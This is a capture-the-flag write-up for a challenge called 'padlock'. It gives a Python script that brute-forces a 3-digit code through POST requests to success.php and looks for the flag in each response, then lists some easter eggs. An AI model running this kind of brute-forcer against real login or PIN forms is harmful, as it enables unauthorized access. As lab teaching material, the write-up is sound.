40 lines
1.5 KiB
Markdown
40 lines
1.5 KiB
Markdown
|
# CHALLENGE padlock
|
||
|
|
|
||
|
|
## Writeup
|
||
|
|
To get the flag, a 3-digit code has to be found. As 3 digits only offers 999 combinations, brute-force would be the way to go.
|
||
|
|
In the source code of `index.php`, we can find that for each try, a POST-request is sent to `success.php`. The post request contains 3 values: `try100`, `try10` and `try1`. In the brute-force we have to enumerate each value from 0 to 9. We can check each response for the flag by looking for `"IG{`. If we got a match the respons might contain a flag.
|
||
|
|
|
||
|
|
A simple brute-force program in Python would look like this:
|
||
|
|
|
||
|
|
```python
|
||
|
|
import requests
|
||
|
|
|
||
|
|
# change URL path
|
||
|
|
url = "success.php"
|
||
|
|
|
||
|
|
def checkForSolution(text):
|
||
|
|
if text.find("IG{") == -1:
|
||
|
|
return False
|
||
|
|
else:
|
||
|
|
substr = text.find("IG{")
|
||
|
|
print(text[substr:text.find("}", substr) + 1])
|
||
|
|
return True
|
||
|
|
|
||
|
|
def bruteForce():
|
||
|
|
for h in range(10):
|
||
|
|
for t in range(10):
|
||
|
|
for u in range(10):
|
||
|
|
param = {'try100': h, 'try10': t, 'try1': u}
|
||
|
|
req = requests.post(url, data = param)
|
||
|
|
print("try:", h, t, u)
|
||
|
|
if checkForSolution(req.text):
|
||
|
|
return True
|
||
|
|
|
||
|
|
bruteForce()
|
||
|
|
```
|
||
|
|
|
||
|
|
## Easter eggs
|
||
|
|
In `robots.txt` a file `flag.txt` is disallowed, this file contains an ascii-art of a beautiful flag.
|
||
|
|
Trying combinations like '420' or '069' will redirect to a new page. Also a cookie is placed, as long as this cookie exists, the index page shows a 4-digit combination. However, this newly placed digit does not do anything.
|
||
|
|
The cookie placed contains a Base64-string.
|